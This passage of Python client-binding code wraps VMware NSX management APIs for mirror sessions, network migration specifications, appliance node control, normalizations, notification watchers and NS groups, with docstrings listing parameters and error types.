            'proxy_id': proxy_id,
            'metadata_proxy': metadata_proxy,
        }
        return self._invoke('update', call_args)
class MirrorSessions(VapiInterface):
    """
    Client-side binding for the port mirroring session service.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.mirror_sessions'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        super(MirrorSessions, self).__init__(config, _MirrorSessionsStub)
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               port_mirroring_session,
               ):
        """
        Create a mirror session.

        :type port_mirroring_session: :class:`com.vmware.nsx.model_client.PortMirroringSession`
        :param port_mirroring_session: (required)
        :rtype: :class:`com.vmware.nsx.model_client.PortMirroringSession`
        :return: com.vmware.nsx.model.PortMirroringSession
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'port_mirroring_session': port_mirroring_session,
        }
        return self._invoke('create', call_args)
    def delete(self,
               mirror_session_id,
               ):
        """
        Delete the mirror session.

        :type mirror_session_id: :class:`str`
        :param mirror_session_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'mirror_session_id': mirror_session_id,
        }
        return self._invoke('delete', call_args)
    def get(self,
            mirror_session_id,
            ):
        """
        Get the mirror session.

        :type mirror_session_id: :class:`str`
        :param mirror_session_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.PortMirroringSession`
        :return: com.vmware.nsx.model.PortMirroringSession
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'mirror_session_id': mirror_session_id,
        }
        return self._invoke('get', call_args)
    def list(self,
             cursor=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        List all mirror sessions.

        :type cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.PortMirroringSessionListResult`
        :return: com.vmware.nsx.model.PortMirroringSessionListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', call_args)
    def update(self,
               mirror_session_id,
               port_mirroring_session,
               ):
        """
        Update the mirror session.

        :type mirror_session_id: :class:`str`
        :param mirror_session_id: (required)
        :type port_mirroring_session: :class:`com.vmware.nsx.model_client.PortMirroringSession`
        :param port_mirroring_session: (required)
        :rtype: :class:`com.vmware.nsx.model_client.PortMirroringSession`
        :return: com.vmware.nsx.model.PortMirroringSession
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'mirror_session_id': mirror_session_id,
            'port_mirroring_session': port_mirroring_session,
        }
        return self._invoke('update', call_args)
    def verify(self,
               mirror_session_id,
               ):
        """
        Verify whether all participants are on the same transport node.

        :type mirror_session_id: :class:`str`
        :param mirror_session_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'mirror_session_id': mirror_session_id,
        }
        return self._invoke('verify', call_args)
class NetworkMigrationSpecs(VapiInterface):
    """
    Client-side binding for the network migration specification service.
    """
    LIST_TYPE_HOSTPROFILENETWORKMIGRATIONSPEC = "HostProfileNetworkMigrationSpec"
    """
    Possible value for ``type`` of method :func:`NetworkMigrationSpecs.list`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.network_migration_specs'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        super(NetworkMigrationSpecs, self).__init__(config, _NetworkMigrationSpecsStub)
        self._VAPI_OPERATION_IDS = {}
    def create(self,
               network_migration_spec,
               ):
        """
        Create a network migration specification. Once created it serves as a
        template telling the associated component which networks should be
        migrated and where. Currently a migration template can be associated
        with compute collections managed by vCenter host profiles, to trigger
        automatic network migration for Stateless ESX hosts. Only the
        HostProfileNetworkMigrationSpec type of specification can be created.
        Note- transport node templates APIs are deprecated; use transport node
        profiles APIs instead.

        :type network_migration_spec: :class:`vmware.vapi.struct.VapiStruct`
        :param network_migration_spec: (required)
            The parameter must contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.NetworkMigrationSpec`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.NetworkMigrationSpec
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.NetworkMigrationSpec`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'network_migration_spec': network_migration_spec,
        }
        return self._invoke('create', call_args)
    def delete(self,
               template_id,
               ):
        """
        Delete the specified network migration specification template. The
        delete fails if this is a HostProfileNetworkMigrationSpec associated
        with a compute collection. Note- transport node templates APIs are
        deprecated; use transport node profiles APIs instead.

        :type template_id: :class:`str`
        :param template_id: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'template_id': template_id,
        }
        return self._invoke('delete', call_args)
    def get(self,
            template_id,
            ):
        """
        Get a network migration specification by template id. The
        specification is a template telling the associated component which
        networks should be migrated and where; it can be associated with
        compute collections managed by vCenter host profiles, to trigger
        automatic network migration for Stateless ESX hosts. Note- transport
        node templates APIs are deprecated; use transport node profiles APIs
        instead.

        :type template_id: :class:`str`
        :param template_id: (required)
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.NetworkMigrationSpec
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.NetworkMigrationSpec`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'template_id': template_id,
        }
        return self._invoke('get', call_args)
    def list(self,
             cursor=None,
             include_system_owned=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             type=None,
             ):
        """
        List network migration specifications. A specification is a template
        telling the associated component which networks should be migrated
        and where; it can be associated with compute collections managed by
        vCenter host profiles, to trigger automatic network migration for
        Stateless ESX hosts. Note- transport node templates APIs are
        deprecated; use transport node profiles APIs instead.

        :type cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type include_system_owned: :class:`bool` or ``None``
        :param include_system_owned: Whether the list result contains system resources (optional,
            default to false)
        :type included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :type type: :class:`str` or ``None``
        :param type: Supported network migration specification types. (optional)
        :rtype: :class:`com.vmware.nsx.model_client.NetworkMigrationSpecListResult`
        :return: com.vmware.nsx.model.NetworkMigrationSpecListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'cursor': cursor,
            'include_system_owned': include_system_owned,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
            'type': type,
        }
        return self._invoke('list', call_args)
    def update(self,
               template_id,
               network_migration_spec,
               ):
        """
        Update a network migration specification. For a
        HostProfileNetworkMigrationSpec already associated with a compute
        collection, updating it means that the next time the system triggers
        migration for hosts managed by the compute collection, the updated
        migration specification is used. Only the
        HostProfileNetworkMigrationSpec type of specification is supported.
        Note- transport node templates APIs are deprecated; use transport
        node profiles APIs instead.

        :type template_id: :class:`str`
        :param template_id: (required)
        :type network_migration_spec: :class:`vmware.vapi.struct.VapiStruct`
        :param network_migration_spec: (required)
            The parameter must contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.NetworkMigrationSpec`.
        :rtype: :class:`vmware.vapi.struct.VapiStruct`
        :return: com.vmware.nsx.model.NetworkMigrationSpec
            The return value will contain all the attributes defined in
            :class:`com.vmware.nsx.model_client.NetworkMigrationSpec`.
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'template_id': template_id,
            'network_migration_spec': network_migration_spec,
        }
        return self._invoke('update', call_args)
class Node(VapiInterface):
    """
    Client-side binding for the NSX appliance node service.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.node'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        super(Node, self).__init__(config, _NodeStub)
        self._VAPI_OPERATION_IDS = {}
    def get(self):
        """
        Returns information about the NSX appliance. Information includes
        release number, time zone, system time, kernel version, message of
        the day (motd), and host name.

        :rtype: :class:`com.vmware.nsx.model_client.NodeProperties`
        :return: com.vmware.nsx.model.NodeProperties
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        # No request parameters for this operation.
        return self._invoke('get', None)
    def restart(self):
        """
        Restarts or shuts down the NSX appliance.

        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        # No request parameters for this operation.
        return self._invoke('restart', None)
    def setsystemtime(self,
                      node_time,
                      ):
        """
        Set the node system time to the given time in UTC in the RFC3339
        format 'yyyy-mm-ddThh:mm:ssZ'.

        :type node_time: :class:`com.vmware.nsx.model_client.NodeTime`
        :param node_time: (required)
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.ConcurrentChange`
            Conflict
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'node_time': node_time,
        }
        return self._invoke('setsystemtime', call_args)
    def shutdown(self):
        """
        Restarts or shuts down the NSX appliance.

        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        # No request parameters for this operation.
        return self._invoke('shutdown', None)
    def update(self,
               node_properties,
               ):
        """
        Modifies NSX appliance properties. Modifiable properties include the
        timezone, message of the day (motd), and hostname. The NSX appliance
        node_version, system_time, and kernel_version are read only and
        cannot be modified with this method.

        :type node_properties: :class:`com.vmware.nsx.model_client.NodeProperties`
        :param node_properties: (required)
        :rtype: :class:`com.vmware.nsx.model_client.NodeProperties`
        :return: com.vmware.nsx.model.NodeProperties
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'node_properties': node_properties,
        }
        return self._invoke('update', call_args)
class Normalizations(VapiInterface):
    """
    Client-side binding for the resource normalization service.
    """
    LIST_PREFERRED_NORMALIZATION_TYPE_NSGROUP = "NSGroup"
    """
    Possible value for ``preferredNormalizationType`` of method
    :func:`Normalizations.list`.
    """
    LIST_PREFERRED_NORMALIZATION_TYPE_IPSET = "IPSet"
    """
    Possible value for ``preferredNormalizationType`` of method
    :func:`Normalizations.list`.
    """
    LIST_PREFERRED_NORMALIZATION_TYPE_MACSET = "MACSet"
    """
    Possible value for ``preferredNormalizationType`` of method
    :func:`Normalizations.list`.
    """
    LIST_PREFERRED_NORMALIZATION_TYPE_LOGICALSWITCH = "LogicalSwitch"
    """
    Possible value for ``preferredNormalizationType`` of method
    :func:`Normalizations.list`.
    """
    LIST_PREFERRED_NORMALIZATION_TYPE_LOGICALPORT = "LogicalPort"
    """
    Possible value for ``preferredNormalizationType`` of method
    :func:`Normalizations.list`.
    """
    LIST_PREFERRED_NORMALIZATION_TYPE_DIRECTORYGROUP = "DirectoryGroup"
    """
    Possible value for ``preferredNormalizationType`` of method
    :func:`Normalizations.list`.
    """
    LIST_RESOURCE_TYPE_NSGROUP = "NSGroup"
    """
    Possible value for ``resourceType`` of method :func:`Normalizations.list`.
    """
    _VAPI_SERVICE_ID = 'com.vmware.nsx.normalizations'
    """
    Identifier of the service in canonical form.
    """
    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        super(Normalizations, self).__init__(config, _NormalizationsStub)
        self._VAPI_OPERATION_IDS = {}
    def list(self,
             preferred_normalization_type,
             resource_id,
             resource_type,
             cursor=None,
             included_fields=None,
             page_size=None,
             sort_ascending=None,
             sort_by=None,
             ):
        """
        Returns the list of normalized resources based on the query
        parameters. The id and type of the resource to normalize are given
        as query parameters in the URI, along with the target resource type
        that normalization should produce.

        :type preferred_normalization_type: :class:`str`
        :param preferred_normalization_type: Resource type valid for use as target in normalization API.
            (required)
        :type resource_id: :class:`str`
        :param resource_id: Identifier of the resource on which normalization is to be
            performed (required)
        :type resource_type: :class:`str`
        :param resource_type: Resource type valid for use as source in normalization API.
            (required)
        :type cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of records (supplied
            by current result page) (optional)
        :type included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be included in query
            result (optional)
        :type page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page (server may return
            fewer) (optional, default to 1000)
        :type sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.NormalizedResourceListResult`
        :return: com.vmware.nsx.model.NormalizedResourceListResult
        :raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
            Service Unavailable
        :raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
            Bad Request, Precondition Failed
        :raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
            Internal Server Error
        :raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
            Forbidden
        :raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
            Not Found
        """
        call_args = {
            'preferred_normalization_type': preferred_normalization_type,
            'resource_id': resource_id,
            'resource_type': resource_type,
            'cursor': cursor,
            'included_fields': included_fields,
            'page_size': page_size,
            'sort_ascending': sort_ascending,
            'sort_by': sort_by,
        }
        return self._invoke('list', call_args)
class NotificationWatchers(VapiInterface):
    """Client bindings for the ``com.vmware.nsx.notification_watchers`` service."""

    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.notification_watchers'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        super(NotificationWatchers, self).__init__(config, _NotificationWatchersStub)
        self._VAPI_OPERATION_IDS = {}

    def create(self, notification_watcher):
        """
        Add a new notification watcher.

        :type  notification_watcher: :class:`com.vmware.nsx.model_client.NotificationWatcher`
        :param notification_watcher: (required)
        :rtype: :class:`com.vmware.nsx.model_client.NotificationWatcher`
        :return: com.vmware.nsx.model.NotificationWatcher
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('create',
                            dict(notification_watcher=notification_watcher))

    def delete(self, watcher_id):
        """
        Delete notification watcher.

        :type  watcher_id: :class:`str`
        :param watcher_id: (required)
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('delete', dict(watcher_id=watcher_id))

    def get(self, watcher_id):
        """
        Returns notification watcher by watcher id.

        :type  watcher_id: :class:`str`
        :param watcher_id: (required)
        :rtype: :class:`com.vmware.nsx.model_client.NotificationWatcher`
        :return: com.vmware.nsx.model.NotificationWatcher
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('get', dict(watcher_id=watcher_id))

    def list(self):
        """
        Returns a list of registered notification watchers.

        :rtype: :class:`com.vmware.nsx.model_client.NotificationWatcherListResult`
        :return: com.vmware.nsx.model.NotificationWatcherListResult
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        # The operation takes no arguments, so no input struct is sent.
        return self._invoke('list', None)

    def update(self, watcher_id, notification_watcher):
        """
        Update notification watcher.

        :type  watcher_id: :class:`str`
        :param watcher_id: (required)
        :type  notification_watcher: :class:`com.vmware.nsx.model_client.NotificationWatcher`
        :param notification_watcher: (required)
        :rtype: :class:`com.vmware.nsx.model_client.NotificationWatcher`
        :return: com.vmware.nsx.model.NotificationWatcher
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('update',
                            dict(watcher_id=watcher_id,
                                 notification_watcher=notification_watcher))
class NsGroups(VapiInterface):
    """Client bindings for the ``com.vmware.nsx.ns_groups`` service."""

    # Possible values for the ``action`` argument of
    # :func:`NsGroups.addorremoveexpression`.
    ADDORREMOVEEXPRESSION_ACTION_ADD_MEMBERS = "ADD_MEMBERS"
    ADDORREMOVEEXPRESSION_ACTION_REMOVE_MEMBERS = "REMOVE_MEMBERS"

    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.ns_groups'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
        super(NsGroups, self).__init__(config, _NsGroupsStub)
        self._VAPI_OPERATION_IDS = {}

    def addorremoveexpression(self, ns_group_id, ns_group_expression_list, action):
        """
        Add/remove the expressions passed in the request body to/from the
        NSGroup.

        :type  ns_group_id: :class:`str`
        :param ns_group_id: NSGroup Id (required)
        :type  ns_group_expression_list: :class:`com.vmware.nsx.model_client.NSGroupExpressionList`
        :param ns_group_expression_list: (required)
        :type  action: :class:`str`
        :param action: Specifies addition or removal action (required); see the
            ``ADDORREMOVEEXPRESSION_ACTION_*`` class constants.
        :rtype: :class:`com.vmware.nsx.model_client.NSGroup`
        :return: com.vmware.nsx.model.NSGroup
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('addorremoveexpression',
                            dict(ns_group_id=ns_group_id,
                                 ns_group_expression_list=ns_group_expression_list,
                                 action=action))

    def create(self, ns_group):
        """
        Creates a new NSGroup that can group NSX resources - VIFs, Lports and
        LSwitches as well as the grouping objects - IPSet, MACSet and other
        NSGroups. For NSGroups containing VM criteria (both static and
        dynamic), system VMs will not be included as members; this filter
        applies at VM level only. Exception: LogicalPorts and VNI of system
        VMs will be included in the NSGroup if the criteria is based on
        LogicalPort, LogicalSwitch or VNI directly.

        :type  ns_group: :class:`com.vmware.nsx.model_client.NSGroup`
        :param ns_group: (required)
        :rtype: :class:`com.vmware.nsx.model_client.NSGroup`
        :return: com.vmware.nsx.model.NSGroup
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('create', dict(ns_group=ns_group))

    def delete(self, ns_group_id, force=None):
        """
        Deletes the specified NSGroup. By default, if the NSGroup is added to
        another NSGroup, it won't be deleted; pass \"force=true\" as a query
        param to force delete it in that situation.

        :type  ns_group_id: :class:`str`
        :param ns_group_id: NSGroup Id (required)
        :type  force: :class:`bool` or ``None``
        :param force: Force delete the resource even if it is being used
            somewhere (optional, default to false)
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('delete',
                            dict(ns_group_id=ns_group_id, force=force))

    def get(self, ns_group_id, populate_references=None):
        """
        Returns information about the specified NSGroup.

        :type  ns_group_id: :class:`str`
        :param ns_group_id: NSGroup Id (required)
        :type  populate_references: :class:`bool` or ``None``
        :param populate_references: Populate metadata of resource referenced
            by NSGroupExpressions (optional, default to false)
        :rtype: :class:`com.vmware.nsx.model_client.NSGroup`
        :return: com.vmware.nsx.model.NSGroup
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('get',
                            dict(ns_group_id=ns_group_id,
                                 populate_references=populate_references))

    def list(self,
             cursor=None,
             included_fields=None,
             member_types=None,
             page_size=None,
             populate_references=None,
             sort_ascending=None,
             sort_by=None):
        """
        List the NSGroups in a paginated format. The page size is restricted
        to 50 NSGroups so that the size of the response remains small even in
        the worst case. Optionally, specify valid member types as a request
        parameter to filter NSGroups.

        :type  cursor: :class:`str` or ``None``
        :param cursor: Opaque cursor to be used for getting next page of
            records (supplied by current result page) (optional)
        :type  included_fields: :class:`str` or ``None``
        :param included_fields: Comma separated list of fields that should be
            included in query result (optional)
        :type  member_types: :class:`str` or ``None``
        :param member_types: Specify member types to filter corresponding
            NSGroups (optional)
        :type  page_size: :class:`long` or ``None``
        :param page_size: Maximum number of results to return in this page
            (server may return fewer) (optional, default to 1000)
        :type  populate_references: :class:`bool` or ``None``
        :param populate_references: Populate metadata of resource referenced
            by NSGroupExpressions (optional, default to false)
        :type  sort_ascending: :class:`bool` or ``None``
        :param sort_ascending: (optional)
        :type  sort_by: :class:`str` or ``None``
        :param sort_by: Field by which records are sorted (optional)
        :rtype: :class:`com.vmware.nsx.model_client.NSGroupListResult`
        :return: com.vmware.nsx.model.NSGroupListResult
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        query = dict(cursor=cursor,
                     included_fields=included_fields,
                     member_types=member_types,
                     page_size=page_size,
                     populate_references=populate_references,
                     sort_ascending=sort_ascending,
                     sort_by=sort_by)
        return self._invoke('list', query)

    def update(self, ns_group_id, ns_group):
        """
        Updates the specified NSGroup. Modifiable parameters include the
        description, display_name and members. For NSGroups containing VM
        criteria (both static and dynamic), system VMs will not be included
        as members; this filter applies at VM level only. Exception:
        LogicalPorts and VNI of system VMs will be included in the NSGroup if
        the criteria is based on LogicalPort, LogicalSwitch or VNI directly.

        :type  ns_group_id: :class:`str`
        :param ns_group_id: NSGroup Id (required)
        :type  ns_group: :class:`com.vmware.nsx.model_client.NSGroup`
        :param ns_group: (required)
        :rtype: :class:`com.vmware.nsx.model_client.NSGroup`
        :return: com.vmware.nsx.model.NSGroup
        :raise: a :mod:`com.vmware.vapi.std.errors_client` error
            (``ServiceUnavailable``, ``InvalidRequest``, ``InternalServerError``,
            ``Unauthorized`` or ``NotFound``) on server-side failure.
        """
        return self._invoke('update',
                            dict(ns_group_id=ns_group_id, ns_group=ns_group))
class NsProfiles(VapiInterface):
    """Client bindings for the ``com.vmware.nsx.ns_profiles`` service."""

    # Identifier of the service in canonical form.
    _VAPI_SERVICE_ID = 'com.vmware.nsx.ns_profiles'

    def __init__(self, config):
        """
        :type  config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
        :param config: Configuration to be used for creating the stub.
        """
